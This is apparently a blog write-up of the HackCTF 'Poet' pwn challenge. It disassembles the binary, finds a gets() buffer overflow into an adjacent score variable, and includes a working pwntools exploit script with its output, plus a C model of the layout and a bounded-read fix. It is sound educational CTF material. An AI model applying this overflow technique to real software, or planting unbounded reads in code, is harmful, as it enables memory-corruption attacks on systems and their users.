[HackCTF] Poet

Intro

Hello :D

I'm still just working through the HackCTF problems, haha.

Maybe I'm overthinking them.. a lot of them turn out to be anticlimactic once solved ㅠ

Let's get started!!

Write-up

root@goorm:/workspace/LCH_Server/HackCTF/13.Poet# ./poet

**********************************************************
*     우리는 2018년의 시인(poet)을 찾고 있습니다.        *
*  플래그상을 받고 싶다면 지금 한 줄의 시를 쓰세요!      *
**********************************************************

Enter :
> aaaa
이 시의 저자는 누구입니까?
> bbbb

+---------------------------------------------------------------------------+
시 내용
aaaa
점수:0

음...이 시로는 충분하지가 않습니다.
정확히 1,000,000 점을 획득해야만 됩니다.
다시 시도해주세요!
+---------------------------------------------------------------------------+

Enter :
>

The program reads one line of poetry and then an author name.

It says the flag prize is awarded only when the score is exactly 1,000,000.

gdb-peda$ pd main
Dump of assembler code for function main:
   0x00000000004009cc <+0>:     push   rbp
   0x00000000004009cd <+1>:     mov    rbp,rsp
   0x00000000004009d0 <+4>:     sub    rsp,0x10
   0x00000000004009d4 <+8>:     mov    DWORD PTR [rbp-0x4],edi
   0x00000000004009d7 <+11>:    mov    QWORD PTR [rbp-0x10],rsi
   0x00000000004009db <+15>:    mov    rax,QWORD PTR [rip+0x20169e]        # 0x602080 <stdout@@GLIBC_2.2.5>
   0x00000000004009e2 <+22>:    mov    ecx,0x0
   0x00000000004009e7 <+27>:    mov    edx,0x2
   0x00000000004009ec <+32>:    mov    esi,0x0
   0x00000000004009f1 <+37>:    mov    rdi,rax
   0x00000000004009f4 <+40>:    call   0x4006a0 <setvbuf@plt>
   0x00000000004009f9 <+45>:    mov    edi,0x400c68
   0x00000000004009fe <+50>:    call   0x400640 <puts@plt>
   0x0000000000400a03 <+55>:    mov    eax,0x0
   0x0000000000400a08 <+60>:    call   0x400978 <get_poem>
   0x0000000000400a0d <+65>:    mov    eax,0x0
   0x0000000000400a12 <+70>:    call   0x4009a7 <get_author>
   0x0000000000400a17 <+75>:    mov    eax,0x0
   0x0000000000400a1c <+80>:    call   0x400844 <rate_poem>
   0x0000000000400a21 <+85>:    mov    eax,DWORD PTR [rip+0x201ab9]        # 0x6024e0 <poem+1088>
   0x0000000000400a27 <+91>:    cmp    eax,0xf4240
   0x0000000000400a2c <+96>:    jne    0x400a3a <main+110>
   0x0000000000400a2e <+98>:    mov    eax,0x0
   0x0000000000400a33 <+103>:   call   0x4007e6 <reward>
   0x0000000000400a38 <+108>:   jmp    0x400a03 <main+55>
   0x0000000000400a3a <+110>:   mov    edi,0x400d78
   0x0000000000400a3f <+115>:   call   0x400640 <puts@plt>
   0x0000000000400a44 <+120>:   jmp    0x400a03 <main+55>
End of assembler dump.

This is main.

In a loop it calls get_poem(), get_author(), rate_poem(), and then compares the value at 0x6024e0 (<poem+1088>) against 0xf4240 (1,000,000); only on a match does it call reward(). reward() is presumably where the flag gets printed, right?

gdb-peda$ pd rate_poem
Dump of assembler code for function rate_poem:
   0x0000000000400844 <+0>:     push   rbp
   0x0000000000400845 <+1>:     mov    rbp,rsp
   0x0000000000400848 <+4>:     sub    rsp,0x410
   0x000000000040084f <+11>:    lea    rax,[rbp-0x410]
   0x0000000000400856 <+18>:    mov    esi,0x6020a0
   0x000000000040085b <+23>:    mov    rdi,rax
   0x000000000040085e <+26>:    call   0x400630 <strcpy@plt>
   0x0000000000400863 <+31>:    lea    rax,[rbp-0x410]
   0x000000000040086a <+38>:    mov    esi,0x400b91
   0x000000000040086f <+43>:    mov    rdi,rax
   0x0000000000400872 <+46>:    call   0x4006c0 <strtok@plt>
   0x0000000000400877 <+51>:    mov    QWORD PTR [rbp-0x8],rax
   0x000000000040087b <+55>:    jmp    0x40094e <rate_poem+266>
   0x0000000000400880 <+60>:    mov    rax,QWORD PTR [rbp-0x8]
   0x0000000000400884 <+64>:    mov    esi,0x400b94
   0x0000000000400889 <+69>:    mov    rdi,rax
   0x000000000040088c <+72>:    call   0x400680 <strcmp@plt>
   0x0000000000400891 <+77>:    test   eax,eax
   0x0000000000400893 <+79>:    je     0x40092c <rate_poem+232>
   0x0000000000400899 <+85>:    mov    rax,QWORD PTR [rbp-0x8]
   0x000000000040089d <+89>:    mov    esi,0x400b99
   0x00000000004008a2 <+94>:    mov    rdi,rax
   0x00000000004008a5 <+97>:    call   0x400680 <strcmp@plt>
   0x00000000004008aa <+102>:   test   eax,eax
   0x00000000004008ac <+104>:   je     0x40092c <rate_poem+232>
   0x00000000004008ae <+106>:   mov    rax,QWORD PTR [rbp-0x8]
   0x00000000004008b2 <+110>:   mov    esi,0x400b9d
   0x00000000004008b7 <+115>:   mov    rdi,rax
   0x00000000004008ba <+118>:   call   0x400680 <strcmp@plt>
   0x00000000004008bf <+123>:   test   eax,eax
   0x00000000004008c1 <+125>:   je     0x40092c <rate_poem+232>
   0x00000000004008c3 <+127>:   mov    rax,QWORD PTR [rbp-0x8]
   0x00000000004008c7 <+131>:   mov    esi,0x400ba3
   0x00000000004008cc <+136>:   mov    rdi,rax
   0x00000000004008cf <+139>:   call   0x400680 <strcmp@plt>
   0x00000000004008d4 <+144>:   test   eax,eax
   0x00000000004008d6 <+146>:   je     0x40092c <rate_poem+232>
   0x00000000004008d8 <+148>:   mov    rax,QWORD PTR [rbp-0x8]
   0x00000000004008dc <+152>:   mov    esi,0x400ba7
   0x00000000004008e1 <+157>:   mov    rdi,rax
   0x00000000004008e4 <+160>:   call   0x400680 <strcmp@plt>
   0x00000000004008e9 <+165>:   test   eax,eax
   0x00000000004008eb <+167>:   je     0x40092c <rate_poem+232>
   0x00000000004008ed <+169>:   mov    rax,QWORD PTR [rbp-0x8]
   0x00000000004008f1 <+173>:   mov    esi,0x400bae
   0x00000000004008f6 <+178>:   mov    rdi,rax
   0x00000000004008f9 <+181>:   call   0x400680 <strcmp@plt>
   0x00000000004008fe <+186>:   test   eax,eax
   0x0000000000400900 <+188>:   je     0x40092c <rate_poem+232>
   0x0000000000400902 <+190>:   mov    rax,QWORD PTR [rbp-0x8]
   0x0000000000400906 <+194>:   mov    esi,0x400bb2
   0x000000000040090b <+199>:   mov    rdi,rax
   0x000000000040090e <+202>:   call   0x400680 <strcmp@plt>
   0x0000000000400913 <+207>:   test   eax,eax
   0x0000000000400915 <+209>:   je     0x40092c <rate_poem+232>
   0x0000000000400917 <+211>:   mov    rax,QWORD PTR [rbp-0x8]
   0x000000000040091b <+215>:   mov    esi,0x400bba
   0x0000000000400920 <+220>:   mov    rdi,rax
   0x0000000000400923 <+223>:   call   0x400680 <strcmp@plt>
   0x0000000000400928 <+228>:   test   eax,eax
   0x000000000040092a <+230>:   jne    0x40093b <rate_poem+247>
   0x000000000040092c <+232>:   mov    eax,DWORD PTR [rip+0x201bae]        # 0x6024e0 <poem+1088>
   0x0000000000400932 <+238>:   add    eax,0x64
   0x0000000000400935 <+241>:   mov    DWORD PTR [rip+0x201ba5],eax        # 0x6024e0 <poem+1088>
   0x000000000040093b <+247>:   mov    esi,0x400b91
   0x0000000000400940 <+252>:   mov    edi,0x0
   0x0000000000400945 <+257>:   call   0x4006c0 <strtok@plt>
   0x000000000040094a <+262>:   mov    QWORD PTR [rbp-0x8],rax
   0x000000000040094e <+266>:   cmp    QWORD PTR [rbp-0x8],0x0
   0x0000000000400953 <+271>:   jne    0x400880 <rate_poem+60>
   0x0000000000400959 <+277>:   mov    eax,DWORD PTR [rip+0x201b81]        # 0x6024e0 <poem+1088>
   0x000000000040095f <+283>:   mov    edx,eax
   0x0000000000400961 <+285>:   mov    esi,0x6020a0
   0x0000000000400966 <+290>:   mov    edi,0x400bc0
   0x000000000040096b <+295>:   mov    eax,0x0
   0x0000000000400970 <+300>:   call   0x400650 <printf@plt>
   0x0000000000400975 <+305>:   nop
   0x0000000000400976 <+306>:   leave
   0x0000000000400977 <+307>:   ret
End of assembler dump.

This is rate_poem().

It copies the poem onto the stack, splits it into tokens with strtok(), and runs each token through a chain of eight strcmp() calls. If any one of them matches,

it jumps to rate_poem+232 and adds 0x64 (100) to the value at 0x6024e0, then moves on to the next token.

You get the idea, right? 0x6024e0 is the score variable. We need to get it to one million.

gdb-peda$ pd get_author
Dump of assembler code for function get_author:
   0x00000000004009a7 <+0>:     push   rbp
   0x00000000004009a8 <+1>:     mov    rbp,rsp
   0x00000000004009ab <+4>:     mov    edi,0x400c38
   0x00000000004009b0 <+9>:     mov    eax,0x0
   0x00000000004009b5 <+14>:    call   0x400650 <printf@plt>
   0x00000000004009ba <+19>:    mov    edi,0x6024a0
   0x00000000004009bf <+24>:    mov    eax,0x0
   0x00000000004009c4 <+29>:    call   0x400690 <gets@plt>
   0x00000000004009c9 <+34>:    nop
   0x00000000004009ca <+35>:    pop    rbp
   0x00000000004009cb <+36>:    ret
End of assembler dump.

This is get_author. It reads the author name with gets() into the buffer at 0x6024a0, with no length limit at all, so we have a BOF.

That buffer is exactly 64 bytes (0x40) before 0x6024e0, where the score is stored. So a payload of 64 bytes of padding followed by 0xf4240 (=1,000,000) should overwrite the score and get us the flag prize.
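To make that adjacency concrete, here is an added C model of the binary's global layout and of the two ways the author line could be read. This is my own illustration, not source from the challenge or the write-up: the struct offsets are reconstructed from the addresses in the disassembly (poem at 0x6020a0, author 0x400 later, score at <poem+1088>), and the "gets()-style" reader is an assumption about what gets() does to this layout, with the copy capped at the struct so the demo itself stays well-defined C. The bounded reader is the fix a defender would apply: a length-limited read (fgets-style) that can never reach the score field, whatever the input length.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Global layout reconstructed from the disassembly's addresses: poem at
 * 0x6020a0, author at 0x6024a0 (poem+0x400), score at 0x6024e0 (<poem+1088>).
 * The struct reproduces those byte offsets, so author[] is directly
 * followed by score, exactly as in the binary's .bss. */
struct poet_state {
    char poem[1024];
    char author[64];
    int  score;
};

typedef void (*author_reader)(struct poet_state *, const unsigned char *, size_t);

/* Models get_author(): gets() copies the whole line regardless of the
 * 64-byte field, so bytes 64..67 of the line land in score. Writing through
 * the raw byte view of the struct keeps this well-defined C; only the field
 * boundary is ignored here, not the object boundary (demo-only cap). */
void read_author_unbounded(struct poet_state *st, const unsigned char *line, size_t len) {
    unsigned char *raw = (unsigned char *)st;
    size_t off = offsetof(struct poet_state, author);
    size_t room = sizeof *st - off;
    if (len > room) len = room;          /* demo-only cap, see comment above */
    memcpy(raw + off, line, len);
    if (len < room) raw[off + len] = '\0';
}

/* Hardened reader: never writes past author[], always NUL-terminates,
 * and discards the excess the way fgets(author, sizeof author, stdin) would. */
void read_author_bounded(struct poet_state *st, const unsigned char *line, size_t len) {
    if (len > sizeof st->author - 1) len = sizeof st->author - 1;
    memcpy(st->author, line, len);
    st->author[len] = '\0';
}

/* Feeds one author line to `reader` on a zeroed state and returns the score,
 * which rate_poem() would otherwise only ever change in steps of 100. */
int score_after(author_reader reader, const unsigned char *line, size_t len) {
    struct poet_state st;
    memset(&st, 0, sizeof st);
    reader(&st, line, len);
    return st.score;
}

/* Constructed input in the shape the write-up sends: 64 filler bytes followed
 * by the little-endian 32-bit value 1,000,000 (0xf4240). Returns bytes written. */
size_t build_author_line(unsigned char *out, size_t outsz) {
    const uint32_t target = 1000000u;
    if (outsz < 68) return 0;
    memset(out, 'B', 64);
    out[64] = (unsigned char)(target & 0xff);
    out[65] = (unsigned char)((target >> 8) & 0xff);
    out[66] = (unsigned char)((target >> 16) & 0xff);
    out[67] = (unsigned char)((target >> 24) & 0xff);
    return 68;
}

/* Score after the unbounded read: the 4 bytes past author[] become the score
 * (1000000 on a little-endian host such as the x86-64 target). */
int score_with_gets_like_reader(void) {
    unsigned char line[68];
    size_t n = build_author_line(line, sizeof line);
    return score_after(read_author_unbounded, line, n);
}

/* Score after the bounded read: the same input is truncated to 63 bytes,
 * so score is untouched and stays 0. */
int score_with_bounded_reader(void) {
    unsigned char line[68];
    size_t n = build_author_line(line, sizeof line);
    return score_after(read_author_bounded, line, n);
}

int main(void) {
    printf("gets()-style reader: score = %d\n", score_with_gets_like_reader());
    printf("bounded reader:      score = %d\n", score_with_bounded_reader());
    return 0;
}
```

The takeaway for the binary's author is the second reader: the score field is safe not because of any check on the score itself, but because the read into author[] is bounded by sizeof author. Replacing gets() with fgets(author, sizeof author, stdin) (and stripping the newline) is the one-line fix; any reader that ignores the field size lets a 68-byte line choose the score directly.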

from pwn import *

#p = process("./poet")
p = remote("ctf.j0n9hyun.xyz", 3012)

context.log_level = "debug"

payload = b""
million = 0xf4240   # 1,000,000, the score main() checks for before calling reward()

# first prompt: the poem line (get_poem); its contents don't matter
p.recvuntil(b"> ")
p.sendline(b"AAAA")

# second prompt: the author line (get_author), read with gets()
p.recvuntil(b"> ")

payload += b"B" * 64      # fill the 64-byte author buffer at 0x6024a0 up to the score at 0x6024e0
payload += p32(million)   # overwrite the 4-byte score with 1,000,000

p.sendline(payload)

p.interactive()

[+] Opening connection to ctf.j0n9hyun.xyz on port 3012: Done
[*] Switching to interactive mode

+---------------------------------------------------------------------------+
시 내용
AAAA
점수:1000000

축하합니다!

시 내용
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB

2018년 시인 상을 받았습니다!!

보상:
///flag!!

+---------------------------------------------------------------------------+

[*] Got EOF while reading in interactive

Exploit!!

Wrap-up

At first I tried to work the strcmp part and rack up the score one match at a time, but something felt off, lol.

Collecting a million points at 100 per match.. so this turned out to be a problem where you overwrite the variable directly.

Thanks :D
